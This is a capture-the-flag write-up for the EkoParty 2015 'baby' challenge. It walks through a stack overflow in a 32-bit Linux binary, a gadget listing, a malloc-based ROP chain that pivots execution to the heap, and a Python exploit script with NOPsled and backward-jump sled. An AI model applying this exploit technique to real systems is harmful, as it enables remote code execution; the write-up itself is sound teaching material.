EKOparty 2015 baby

@mrexcessive & Cam & Ben WHA

Too much ROP can be a problem

 

The problem

50 points (REALLY @EkoParty !)

32-bit C program, Linux environment. We need to exploit it and get a shell to find the flag.

Pwnable Exploit source-provided binary-provided

 

The solution

FULL DISCLOSURE - not solved until after the event had finished. We have since read 2 other writeups but their methods were different - and different from each other.

Thanks to Team amn3s1a for their encouragement and letting us see their code after event - but before we had finished.


This is more of a tale of persistence than success... though maybe a little success in the end.

Cam, Ben and Tim had already solved the core of getting to the point of ROP when I joined the effort. We were expecting and hoping it would be a case of shellcode on the stack, or somewhere callable.

It appeared that two connections would not share memory usefully, although one of the other teams' writeups has successfully adopted that approach.

We have C source code. The area where we can get control of execution is this:

int __cdecl vul(unsigned __int8 *buf, unsigned int a2)
{
  int result; // eax@10
  char dest[24]; // [sp+10h] [bp-28h]@7
  unsigned int v4; // [sp+28h] [bp-10h]@1
  int i; // [sp+2Ch] [bp-Ch]@7
  v4 = 4 * buf[10];
  if ( v4 > a2 )
  {
    fwrite("Invalid size!\n", 1u, 0xEu, stderr);
    exit(1);
  }
  if ( *buf != buf[1] + 1 || buf[2] != *buf + buf[1] + 2 || buf[3] != buf[1] + buf[2] + 4 )
  {
    result = puts("It's bad:");
  }
  else
  {
    memcpy(dest, buf + 4, 0x50u);
    puts("decoded:");
    for ( i = 0; i < (signed int)v4; ++i )
      putchar((unsigned __int8)dest[i] ^ 0x158);
    result = putchar(10);
  }
  return result;
}

The memcpy() stamps 80 (0x50) bytes over a 24-byte buffer, blatting the v4 and i variables as well as the stack frame (saved EBP), the return address and the 32 bytes beyond it. We can upload 0x3ff bytes into the buf[] byte array; 80 of them, starting at buf + 4, are used for the overwrite.
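The offsets in the decompiler comments are enough to work out where each payload byte lands. The following is a minimal sketch of that arithmetic; the constant and function names are my own, only the numbers come from the listing above.

```python
# Offsets relative to EBP, taken from the decompiler comments in vul().
DEST_OFFSET = -0x28      # char dest[24] at [bp-28h]
V4_OFFSET = -0x10        # unsigned int v4 at [bp-10h]
I_OFFSET = -0x0C         # int i at [bp-0Ch]
SAVED_EBP_OFFSET = 0x00  # saved frame pointer
RET_OFFSET = 0x04        # return address
COPY_LEN = 0x50          # memcpy(dest, buf + 4, 0x50)
WORD = 4


def payload_index(ebp_offset):
    """Index into the copied payload that lands at the given EBP offset."""
    return ebp_offset - DEST_OFFSET


def rop_slots():
    """Number of 4-byte slots from the return address to the end of the copy."""
    return (COPY_LEN - payload_index(RET_OFFSET)) // WORD


layout = {
    "v4": payload_index(V4_OFFSET),
    "i": payload_index(I_OFFSET),
    "saved_ebp": payload_index(SAVED_EBP_OFFSET),
    "ret": payload_index(RET_OFFSET),
}

if __name__ == "__main__":
    for name, index in sorted(layout.items(), key=lambda kv: kv[1]):
        print("%-10s payload offset %d" % (name, index))
    print("ROP slots:", rop_slots())
```

The return address sits 44 bytes into the payload, which leaves room for exactly 9 dwords before the 80-byte copy runs out.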

But in order to get to the memcpy() you have to provide a crafted 4 byte key.

A working key was created, "\x07\x06\x0F\x19", and we had access to memcpy(). For the next 48h we got nothing much except segmentation faults!
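The key check is easy to mirror offline. This is a rough sketch of the test in vul(), assuming the usual C promotion of unsigned bytes to int (so no 8-bit wraparound in the comparisons); key_ok and make_key are hypothetical helper names, not part of our original script.

```python
def key_ok(buf):
    """Mirror the 4-byte header test from vul(); bytes are compared as ints."""
    b0, b1, b2, b3 = buf[0], buf[1], buf[2], buf[3]
    return b0 == b1 + 1 and b2 == b0 + b1 + 2 and b3 == b1 + b2 + 4


def make_key(b1):
    """Derive a valid key from a chosen second byte (hypothetical helper)."""
    b0 = b1 + 1
    b2 = b0 + b1 + 2
    b3 = b1 + b2 + 4
    if b3 > 0xFF:
        raise ValueError("every key byte must fit in 8 bits")
    return bytes([b0, b1, b2, b3])


if __name__ == "__main__":
    print(key_ok(b"\x07\x06\x0F\x19"))
    print(make_key(6))
```

Choosing 6 for the second byte reproduces the key we used; any second byte small enough to keep the fourth byte under 256 should work the same way.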

We could extract data from the process through the putchar loop, but the value of v4 was being overwritten during the memcpy(), so it took a while. We could only get 2 pages of stack data this way. The received data had to be XORed with 0x58 to recover the original bytes.

   for c in r:
      o = ord(c) ^ 0x58      # undo the server-side XOR to get the raw byte back
      sys.stdout.write("%02x " % o)
      sys.stdout.flush()
      rx += chr(o)

We wanted a shell. Unfortunately ASLR was in place.

The process could be made to leak stack addresses, but because the connection dropped after one exchange, these addresses were (I wrongly thought) useless. One of the alternate writeups uses the leaked addresses to complete an exploit.



A tricky problem

The event was over, but I wanted resolution on this.

There didn't seem to be a way to pivot EIP onto the stack. We only had space for 9 ROP instructions. In addition the ROP gadgets found were very poor. Plus there was a problem with the LEAVE instruction needing writeable memory.

It looked as though the shellcode would have to go on the heap, where we could write up to 0x3ff bytes of data... but how to find it !

I realised after a while that malloc() would do this if successful, but struggled to recover a useable address. After a few more hours I read some code - which had got another team the flag - and which did indeed use malloc() to get the page location of the heap.


Team amn3s1a very helpfully let us see their code at this point; you can see it here: https://gist.github.com/soez/4ee5eb07d4a3982815ad
Unfortunately, I couldn't get it to give me a shell locally, and the event had finished so there was no way to test remotely.

In addition to confirming that malloc() was the way forward, I also learned the new (to me) trick of using the __isoc99_scanf@plt pointer in the GOT as a writeable address, suitable for EBP, from the other code.

However, I wanted an exploit which would work reliably, and their code would not give me a shell on the local binary, though it had plainly worked on the flag for them. They had a pile of short backward relative jumps after their shellcode, as well as a tiny NOPsled in front. The REVsled, as I started calling it, seemed an excellent idea; I had not done that before.


The malloc() call is returning a pointer to the heap allocation in eax and also edx. We can do a call *eax or call *edx, but they won't work, because the new allocated space is always ahead of anything we can upload in the 0x3ff bytes.

So we arrive at the seemingly trivial task of using ROP to subtract 0x100 or a similar quantity from eax or edx. Sometime on Sunday afternoon this problem starts to really bite. There are a tiny number of usable ROP gadgets (found using the excellent ROPgadget.py). I've dropped all of those which feature a LEAVE ; RET ending, because they are no use to us.

Gadgets information
============================================================
0x0804860c : add al, -0x39 ; add al, 0x24 ; pushal ; wait ; add al, 8 ; call edx
0x08048659 : add al, 0x24 ; and al, 0xffffff9a ; add al, 8 ; call eax
0x080485d1 : add al, 0x24 ; pushal ; wait ; add al, 8 ; call eax
0x0804860e : add al, 0x24 ; pushal ; wait ; add al, 8 ; call edx
0x08048638 : add al, 8 ; add ecx, ecx ; ret
0x080485d5 : add al, 8 ; call eax
0x08048612 : add al, 8 ; call edx
0x080485b8 : add al, 8 ; cmp eax, 6 ; ja 0x80485c9 ; ret
0x08048797 : add al, ch ; ret
0x08048702 : add bh, byte ptr [ecx] ; ret 0x850f
0x08048795 : add byte ptr [eax], al ; add al, ch ; ret
0x08048485 : add byte ptr [eax], al ; add byte ptr [ebx - 0x7f], bl ; ret
0x0804886b : add byte ptr [eax], al ; add cl, cl ; ret
0x08048487 : add byte ptr [ebx - 0x7f], bl ; ret
0x0804886d : add cl, cl ; ret
0x080485be : add dh, bl ; ret
0x08048635 : add eax, 0x8049b84 ; add ecx, ecx ; ret
0x080485f2 : add eax, edx ; sar eax, 1 ; jne 0x8048601 ; ret
0x0804863a : add ecx, ecx ; ret
0x080488d2 : add esp, 0x1c ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret
0x080485d2 : and al, 0x60 ; wait ; add al, 8 ; call eax
0x0804860f : and al, 0x60 ; wait ; add al, 8 ; call edx
0x08048793 : and al, 0xa ; add byte ptr [eax], al ; add al, ch ; ret
0x0804865b : and al, 0xffffff9a ; add al, 8 ; call eax
0x0804860b : and al, 4 ; mov dword ptr [esp], 0x8049b60 ; call edx
0x08048886 : call 0x80488e0
0x080485d7 : call eax
0x08048614 : call edx
0x080485f5 : clc ; jne 0x80485fe ; ret
0x080485bb : clc ; push es ; ja 0x80485c6 ; ret
0x08048180 : cld ; xchg eax, ebp ; dec esp ; movsd dword ptr es:[edi], dword ptr [esi] ; pop es ; inc edx ; ret
0x080485ba : cmp eax, 6 ; ja 0x80485c7 ; ret
0x080487aa : dec ecx ; ret
0x08048182 : dec esp ; movsd dword ptr es:[edi], dword ptr [esi] ; pop es ; inc edx ; ret
0x080488d1 : fiadd word ptr [ebx + 0x5e5b1cc4] ; pop edi ; pop ebp ; ret
0x08048656 : in al, dx ; sbb bh, al ; add al, 0x24 ; and al, 0xffffff9a ; add al, 8 ; call eax
0x080485ce : in al, dx ; sbb bh, al ; add al, 0x24 ; pushal ; wait ; add al, 8 ; call eax
0x08048872 : in eax, 0x5d ; ret
0x08048185 : inc edx ; ret
0x080485bd : ja 0x80485c4 ; ret
0x080488d0 : jb 0x80488b9 ; add esp, 0x1c ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret
0x080485f6 : jne 0x80485fd ; ret
0x080488d3 : les ebx, ptr [ebx + ebx*2] ; pop esi ; pop edi ; pop ebp ; ret
0x080485f0 : ljmp 0x75f8:0xd1d0011f ; add dh, bl ; ret
0x0804817d : loop 0x804817f ; push eax ; cld ; xchg eax, ebp ; dec esp ; movsd dword ptr es:[edi], dword ptr [esi] ; pop es ; inc edx ; ret
0x08048658 : mov dword ptr [esp], 0x8049a24 ; call eax
0x080485d0 : mov dword ptr [esp], 0x8049b60 ; call eax
0x0804860d : mov dword ptr [esp], 0x8049b60 ; call edx
0x08048871 : mov ebp, esp ; pop ebp ; ret
0x080488da : mov ebx, dword ptr [esp] ; ret
0x08048183 : movsd dword ptr es:[edi], dword ptr [esi] ; pop es ; inc edx ; ret
0x0804817e : not dword ptr [eax - 4] ; xchg eax, ebp ; dec esp ; movsd dword ptr es:[edi], dword ptr [esi] ; pop es ; inc edx ; ret
0x080485d6 : or bh, bh ; ror cl, 1 ; ret
0x08048613 : or bh, bh ; ror cl, cl ; ret
0x080485b9 : or byte ptr [ebx + 0x27706f8], al ; ret
0x080485f1 : pop ds ; add eax, edx ; sar eax, 1 ; jne 0x8048602 ; ret
0x08048873 : pop ebp ; ret
0x080488d5 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret
0x080488d7 : pop edi ; pop ebp ; ret
0x08048184 : pop es ; inc edx ; ret
0x080488d6 : pop esi ; pop edi ; pop ebp ; ret
0x0804817f : push eax ; cld ; xchg eax, ebp ; dec esp ; movsd dword ptr es:[edi], dword ptr [esi] ; pop es ; inc edx ; ret
0x08048870 : push ebp ; mov ebp, esp ; pop ebp ; ret
0x08048885 : push ebx ; call 0x80488e1
0x08048883 : push edi ; push esi ; push ebx ; call 0x80488e3
0x080485bc : push es ; ja 0x80485c5 ; ret
0x08048884 : push esi ; push ebx ; call 0x80488e2
0x080485d3 : pushal ; wait ; add al, 8 ; call eax
0x08048610 : pushal ; wait ; add al, 8 ; call edx
0x080485f3 : rcl cl, 1 ; clc ; jne 0x8048600 ; ret
0x08048186 : ret
0x080486d9 : ret 0
0x080486d3 : ret 0x3901
0x08048732 : ret 0x3904
0x08048704 : ret 0x850f
0x080485ee : ret 0xeac1
0x080486ca : ret 0xf01
0x08048727 : ret 0xf02
0x08048701 : rol byte ptr [edx], 0x39 ; ret 0x850f
0x080485d8 : ror cl, 1 ; ret
0x08048615 : ror cl, cl ; ret
0x080485f4 : sar eax, 1 ; jne 0x80485ff ; ret
0x080488db : sbb al, 0x24 ; ret
0x080488d4 : sbb al, 0x5b ; pop esi ; pop edi ; pop ebp ; ret
0x08048657 : sbb bh, al ; add al, 0x24 ; and al, 0xffffff9a ; add al, 8 ; call eax
0x080485cf : sbb bh, al ; add al, 0x24 ; pushal ; wait ; add al, 8 ; call eax
0x08048636 : test byte ptr [ebx - 0x36fef7fc], bl ; ret
0x08048637 : wait ; add al, 8 ; add ecx, ecx ; ret
0x080485d4 : wait ; add al, 8 ; call eax
0x08048611 : wait ; add al, 8 ; call edx
0x080485b7 : wait ; add al, 8 ; cmp eax, 6 ; ja 0x80485ca ; ret
0x08048181 : xchg eax, ebp ; dec esp ; movsd dword ptr es:[edi], dword ptr [esi] ; pop es ; inc edx ; ret
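Dropping the LEAVE gadgets from a listing like the one above can be scripted. This is a small sketch, assuming the "address : insn ; insn" text format shown here; usable_gadgets is a made-up helper name and the LEAVE line in the sample uses a made-up address.

```python
def usable_gadgets(ropgadget_lines):
    """Parse 'address : insn ; insn' lines and drop any chain containing LEAVE."""
    kept = []
    for line in ropgadget_lines:
        if " : " not in line:
            continue  # skip headers and separator lines
        address, _, chain = line.partition(" : ")
        insns = [part.strip() for part in chain.split(";")]
        if "leave" in insns:
            continue  # LEAVE needs a sane EBP, so we discard these
        kept.append((int(address, 16), insns))
    return kept


if __name__ == "__main__":
    sample = [
        "Gadgets information",
        "============================================================",
        "0x080485be : add dh, bl ; ret",
        "0x08048000 : leave ; ret",  # hypothetical address, for illustration only
    ]
    for address, insns in usable_gadgets(sample):
        print(hex(address), insns)
```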

The constraint of these instructions, plus the limit of 9 ROP instructions due to how the 0x50 overwritten bytes land on the stack, makes creating a solution something like solving a Sudoku and also strangely like creating a BrainFuck program...

... if you have the time... take a moment and look through those instructions - join me in this pain !!


It is not until Monday afternoon and time off doing other things, that I hit on a working solution.

I can sit two of the instructions on top of each other, reusing the malloc() size argument as the value popped into ebx. That gets 0xff loaded into bl, from where it can modify edx via add dh, bl, and then the call *edx will work and a shell will be delivered.

The key to the solution is this:

0x8048510    malloc()
0x80488d5    pop ebx ; pop esi ; pop edi ; pop ebp ; ret   - malloc will return to this
0xff         size of malloc allocation (255 bytes)   and also pop ebx value (-1 => bl)
0x0          0 -> esi
0x0          0 -> edi
0x0          0 -> ebp    - at this point we don't care about esi, edi or ebp
0x80485be    add dh,bl ; ret    - which is effectively decrement dh
0x8048614    call *$edx
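To see why adding 0xff to dh behaves like subtracting 0x100 from edx, here is a tiny emulation of that one gadget. It is only a sketch: add_dh_bl is my own helper and the pointer values are invented examples, not addresses observed on the target.

```python
def add_dh_bl(edx, ebx):
    """Emulate 'add dh, bl': only bits 8..15 of EDX change, with 8-bit wraparound."""
    dh = (edx >> 8) & 0xFF
    bl = ebx & 0xFF
    new_dh = (dh + bl) & 0xFF
    return (edx & 0xFFFF00FF) | (new_dh << 8)


if __name__ == "__main__":
    heap_ptr = 0x0804B008  # invented example of a malloc() return value
    print(hex(add_dh_bl(heap_ptr, 0xFF)))    # pointer moved back by 0x100
    unlucky = 0x08050008   # invented example where dh is already zero
    print(hex(add_dh_bl(unlucky, 0xFF)))     # dh wraps to 0xff, so edx jumps forward
```

The second case is one reason the exploit is only "probably" reliable: there is no borrow into the upper 16 bits, so a pointer whose dh byte is zero moves forward by 0xff00 instead of back by 0x100.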



The other cunning part of the plan is to wrap the shellcode in both a NOPsled and REVsled, with a payload skipping jump between shellcode and REVsled - so it always works... probably(tm)

    NOPsled         "\x90" bytes for a while
    shellcode        we slide into this...
    backjump * 2    get around the shellcode no matter which we land on
    REVsled         "\xeb\xfa" pairs of bytes go back 4 bytes at a time... always hit one of the backjump
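The REVsled arithmetic is worth checking by hand. A short jmp (opcode 0xeb) takes a signed 8-bit displacement measured from the end of the 2-byte instruction, so "\xeb\xfa" moves back 4 bytes net. The sketch below uses hypothetical helper names, puts the two backjumps at byte offsets 0 and 2, and assumes execution lands on a pair boundary inside the sled.

```python
def short_jmp_target(addr, code):
    """Target of a 2-byte 'jmp rel8' (opcode 0xEB) located at addr."""
    if len(code) != 2 or code[0] != 0xEB:
        raise ValueError("expected a 2-byte short jmp")
    rel8 = code[1] - 0x100 if code[1] >= 0x80 else code[1]
    return addr + 2 + rel8  # displacement is relative to the next instruction


def first_trap_hit(offset, trap_bytes=4):
    """Follow the REVsled from a pair-aligned offset until a backjump is reached."""
    while offset >= trap_bytes:
        offset = short_jmp_target(offset, b"\xeb\xfa")
    return offset


if __name__ == "__main__":
    print(short_jmp_target(100, b"\xeb\xfa"))  # 96: four bytes back
    print(sorted({first_trap_hit(off) for off in range(4, 200, 2)}))
```

Because each hop is 4 bytes and each pair is 2 bytes, the sled forms two interleaved chains, which is why two backjumps are needed. Landing on an odd offset would decode 0xfa first, which is CLI and faults in user mode, so this sketch only covers pair-aligned landings.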


The core of the pwnserver Python script is this:

def PwnServer():
   shellcode = GetShellcode()
   r = GetResponse()
   print r
   buf = "A" * 24
   buf += p(0x01)    # v4 patched to be 1
   buf += "A" * 12
   buf += p(0x8049b54)     # EBP value = where __fscanf() is pointing = writeable
#--- 9 ROP instructions available from here
   buf += p(0x8048510)     # malloc
   buf += p(0x80488d5)     # pop ebx; pop esi; pop edi; pop ebp; ret
   buf += p(0xff)          # size of malloc = 0xff (255) bytes, but also -1 => bl on the pop ebx
   buf += p(0)             # esi popped don't care
   buf += p(0)             # edi popped don't care
   buf += p(0)             # ebp popped don't care
   buf += p(0x80485be)     # add dh,bl ; ret    # this moves edx (the malloc space ptr) back by 0x100 bytes
   buf += p(0x8048614)     # call *edx
   s.send('500\n')
   print "length sent"
   r = GetResponse()
   print r
   nopsled_length = 37
   nopsled = "\x90" * nopsled_length
   revtrap = "\xeb\xc0" * 2      # catch the revsled and send it to before shellcode
   shellcode += revtrap
   # fill whatever is left of the 500 bytes (key + buf + nopsled + shellcode + newline) with the revsled
   revsled_length = ( 500 - (4 + len(buf) + len(shellcode) + 1 + nopsled_length) ) // 2
   shellend = "\xeb\xce"*2      # -50 reverse jump into nopsled (defined but not used in the payload below)
   revsled = "\xeb\xfa" * revsled_length     # jmp rel8 = -6 (EIP -= 0x04 net, because EIP has already advanced +2)
   s.send('\x07\x06\x0F\x19' + buf + nopsled + shellcode + revsled + '\n')
   print "data sent"
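The script above relies on helpers that are not shown. As a rough Python 3 sketch of just the overflow part, assuming p() is a plain 32-bit little-endian pack (my guess at what the helper does) and that the '500' sent first is the length that vul() receives as a2:

```python
import struct


def p(value):
    """Pack a 32-bit little-endian word (assumed equivalent of the script's p())."""
    return struct.pack("<I", value)


def build_overflow():
    """Rebuild the bytes that follow the 4-byte key, up to the end of the ROP chain."""
    chain = [
        0x8048510,  # malloc
        0x80488d5,  # pop ebx ; pop esi ; pop edi ; pop ebp ; ret
        0xff,       # malloc size, later popped into ebx
        0, 0, 0,    # esi, edi, ebp
        0x80485be,  # add dh, bl ; ret
        0x8048614,  # call edx
    ]
    buf = b"A" * 24 + p(0x01) + b"A" * 12 + p(0x8049b54)
    return buf + b"".join(p(word) for word in chain)


if __name__ == "__main__":
    overflow = build_overflow()
    print(len(overflow), "bytes of the 0x50 copied")
    # buf[10] in vul() is index 6 here, because the key occupies buf[0..3]
    print("v4 before the overwrite:", 4 * overflow[6])
```

The chain uses 8 of the 9 available slots, so the last copied dword is just the start of the NOPsled. The initial v4 comes from an "A" byte (4 * 0x41 = 260), which would pass the size check if a2 really is the 500 we sent.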

And success - well locally.
The original baby challenge binary is available on github in the CTF writeups


Never got the flag ;( didn't finish until 6 hrs into effort on Monday.
But got the exploit to work - and learned a lot more about ROP and pivoting to the heap in the process!